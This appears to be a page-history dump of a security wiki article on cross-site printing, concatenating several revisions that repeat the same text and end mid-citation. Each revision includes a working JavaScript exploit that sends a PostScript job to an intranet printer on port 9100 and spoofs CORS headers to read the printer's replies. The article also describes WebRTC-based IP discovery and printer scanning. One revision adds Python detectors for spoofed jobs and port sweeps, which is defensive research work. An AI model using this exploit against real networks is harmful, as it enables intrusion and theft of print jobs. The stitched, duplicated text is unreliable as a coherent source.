A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 65df8a7ad5bd7f67853e0ac73cd40e9f9e1de79e 266 254 2017-01-28T15:24:27Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- 3a646e87f4e510f3f1ad09df2183d8a07a28190a 254 252 2017-01-28T14:28:17Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. 
[[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]]

== Enhanced cross-site printing ==

Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be sent to the device, not received, because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This rules out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be sent in response – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy.
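From the defender's side, the two artefacts described above are exactly what a print server or an inline proxy in front of port 9100/tcp can look for before forwarding a job: a browser-generated HTTP request line with an <code>Origin</code> header at the start of the stream, and PostScript that ''print''s an HTTP status line or an <code>Access-Control-Allow-Origin</code> field in order to spoof a CORS-enabled response. The following Python inspector is an added example, not code from this wiki; the regular expressions are its own heuristics and the sample jobs, addresses and origin are constructed placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple

# Universal Exit Language sequence that wraps the PostScript job on the page.
UEL = b"\x1b%-12345X"

# Heuristics for this example (constructed, not a published signature set):
# a browser request arriving on a raw printing port starts with an HTTP request
# line, and a CORS-spoofing job makes PostScript 'print' an HTTP status line
# and an Access-Control-Allow-Origin field.
HTTP_REQUEST_LINE = re.compile(rb"^(?:POST|GET|PUT|OPTIONS) \S+ HTTP/1\.[01]\r?\n")
SPOOFED_STATUS = re.compile(rb"\(HTTP/1\.[01] \d{3}[^)]*\)\s*print")
SPOOFED_CORS = re.compile(rb"\(Access-Control-Allow-Origin:[^)]*\)\s*print")


def split_http_request(stream: bytes) -> Tuple[Optional[bytes], bytes]:
    """Return (raw_headers, body) if the stream starts with an HTTP request,
    otherwise (None, stream) so the whole stream is treated as job data."""
    if not HTTP_REQUEST_LINE.match(stream):
        return None, stream
    for sep, width in ((b"\r\n\r\n", 4), (b"\n\n", 2)):
        idx = stream.find(sep)
        if idx >= 0:
            return stream[:idx], stream[idx + width:]
    return stream, b""  # header block never terminated: nothing to interpret


def parse_headers(raw: bytes) -> Dict[str, str]:
    """Lower-cased header name -> value; the request line itself is skipped."""
    headers: Dict[str, str] = {}
    for line in raw.split(b"\n")[1:]:
        line = line.rstrip(b"\r")
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers


def inspect_job(stream: bytes) -> Dict[str, object]:
    """Classify one raw job received on port 9100/tcp and report why."""
    findings: List[str] = []
    raw_headers, body = split_http_request(stream)
    origin: Optional[str] = None
    if raw_headers is not None:
        findings.append("http-request-on-raw-port")
        origin = parse_headers(raw_headers).get("origin")  # names the invoking site
        if origin:
            findings.append("browser-origin-present")
    if SPOOFED_STATUS.search(body):
        findings.append("postscript-prints-http-status")
    if SPOOFED_CORS.search(body):
        findings.append("postscript-prints-cors-header")
    return {"suspicious": bool(findings), "findings": findings, "origin": origin}


# Constructed sample: the request a cross-origin XHR would produce, carrying a
# job shaped like the page's proof-of-concept. Host and origin are placeholders.
XSP_SAMPLE = b"".join([
    b"POST / HTTP/1.1\r\n",
    b"Host: 192.0.2.10:9100\r\n",
    b"Origin: http://attacker.example\r\n",
    b"Content-Type: text/plain;charset=UTF-8\r\n",
    b"\r\n",
    UEL, b"\r\n%!\r\n",
    b"(HTTP/1.0 200 OK\\n) print\r\n",
    b"(Access-Control-Allow-Origin: *\\n) print\r\n",
    b"(Connection: close\\n) print\r\n",
    b"product print flush\r\n",
    UEL, b"\r\n",
])

# Constructed sample: an ordinary PostScript document with no HTTP artefacts.
BENIGN_SAMPLE = (
    b"%!PS-Adobe-3.0\n"
    b"/Helvetica findfont 12 scalefont setfont\n"
    b"72 720 moveto (Quarterly report) show\nshowpage\n"
)

if __name__ == "__main__":
    for name, job in (("xsp", XSP_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, inspect_job(job))
```

A proxy that drops or quarantines jobs for which <code>inspect_job</code> reports <code>suspicious</code> stops both the unsolicited printout and the spoofed response, and the extracted <code>origin</code> gives the responder the site that carried the job; the same check is reasonable as a rule in a network sensor that reassembles port 9100 streams.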
A schematic overview of the attack is given below:

[[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]]

In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response, which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snippet is shown below:

<syntaxhighlight lang="javascript">
// The POST body is a PostScript job wrapped in UEL sequences; its 'print'
// statements emit a fake HTTP response header with a permissive CORS field,
// followed by the printer's product name as the response body.
var job = "\x1B%-12345X\r\n" +
          "%!\r\n" +
          "(HTTP/1.0 200 OK\\n) print\r\n" +
          "(Server: PostScript HTTPD\\n) print\r\n" +
          "(Access-Control-Allow-Origin: *\\n) print\r\n" +
          "(Connection: close\\n) print\r\n" +
          "(Content-Length: ) print\r\n" +
          "product dup length dup string cvs print\r\n" +
          "(\\n\\n) print\r\n" +
          "print\r\n" +
          "(\\n) print flush\r\n" +
          "\x1B%-12345X\r\n";
var x = new XMLHttpRequest();
x.open("POST", "http://printer:9100");
x.onreadystatechange = function() {
  if (x.readyState == 4) alert(x.responseText);
};
x.send(job);
</syntaxhighlight>

== Limitations of cross-site printing ==

Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results of PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be sent in response needs to be determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding is not an option either, she needs to set a very high value and use padding.
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.

If the printer device supports plain text printing, the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed, by which time the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W.
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref>, they have some drawbacks beyond not providing feedback using spoofed CORS headers:

* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-type</code> for HTTP POST requests to be set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref>, which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types

A comparison of cross-site printing channels is given below:

{| class="wikitable" style="text-align:center"
|+ Comparison of cross-site printing channels
|-
! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || || ✔ || ✔ ||
|-
| Web || ✔ || || ||
|-
| IPP || ✔ || || ✔ ||
|-
| LPD || ✔ || || ✔ || FF, Ch, Op
|-
| FTP || ✔ || || ✔ || FF, Ch, Op, IE
|}

One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref>, which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing, which only takes seconds in our tests. If the printer is on the same subnet as the victim's host, its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge.
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: we try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.

== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network, meaning XSP requests never reach the intranet printer.
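The printer discovery step described above has a distinctive network footprint: within seconds, one workstation opens connections to port 9100/tcp on every remaining address of its /24, while a workstation that actually prints talks to one or two printers. The following Python detector is an added example, not code from this wiki; it runs a sliding-window count of distinct port 9100 destinations per source over connection log lines. The log format, window, threshold and all addresses are this example's own constructions and should be adapted to the real firewall or flow source.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Tuple

# Constructed log format for this example (key=value pairs as many firewalls
# and flow exporters emit); adjust LOG_RE for the real source.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)"
)


def parse_line(line: str) -> Optional[Tuple[datetime, str, str, int]]:
    """Return (timestamp, src, dst, dport) or None for a line that does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return (datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), m["src"], m["dst"], int(m["dport"]))


def detect_raw_port_sweeps(lines, port: int = 9100, window: timedelta = timedelta(seconds=10),
                           threshold: int = 20) -> Dict[str, int]:
    """Return {source: peak number of distinct destinations contacted on `port`
    inside any `window`} for every source whose peak reaches `threshold`."""
    events: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[3] == port:
            events[parsed[1]].append((parsed[0], parsed[2]))
    alerts: Dict[str, int] = {}
    for src, evs in events.items():
        evs.sort()  # sliding window needs time order
        in_window: Deque[Tuple[datetime, str]] = deque()
        per_dst: Dict[str, int] = defaultdict(int)
        peak = 0
        for ts, dst in evs:
            in_window.append((ts, dst))
            per_dst[dst] += 1
            while ts - in_window[0][0] > window:  # expire events older than the window
                _, old_dst = in_window.popleft()
                per_dst[old_dst] -= 1
                if per_dst[old_dst] == 0:
                    del per_dst[old_dst]
            peak = max(peak, len(per_dst))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


def build_sample_log() -> List[str]:
    """Constructed log: one client sweeping 10.0.0.1-10.0.0.40 on 9100/tcp within
    three seconds, one client printing normally, and an unrelated web request."""
    base = datetime(2017, 1, 28, 14, 28, 17)
    lines: List[str] = []
    for i in range(1, 41):
        ts = base + timedelta(seconds=i % 3)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%SZ} src=10.0.0.23 dst=10.0.0.{i} dport=9100 proto=tcp")
    for offset in (0, 30, 60):
        ts = base + timedelta(seconds=offset)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%SZ} src=10.0.0.50 dst=10.0.0.101 dport=9100 proto=tcp")
    lines.append(f"{base:%Y-%m-%dT%H:%M:%SZ} src=10.0.0.23 dst=10.0.0.1 dport=80 proto=tcp")
    return lines


if __name__ == "__main__":
    print(detect_raw_port_sweeps(build_sample_log()))
```

The alert names the workstation whose browser carried the sweep, which is where the investigation starts (the invoking site is in the printed <code>Origin</code> header or the proxy log). The same counter applied to port 80 against the 115 default router addresses catches the fallback gateway probe, and blocking workstation-to-printer traffic on port 9100/tcp in favour of a print server removes the channel altogether.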
[[File:XSP-deployment-channel.png|480px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
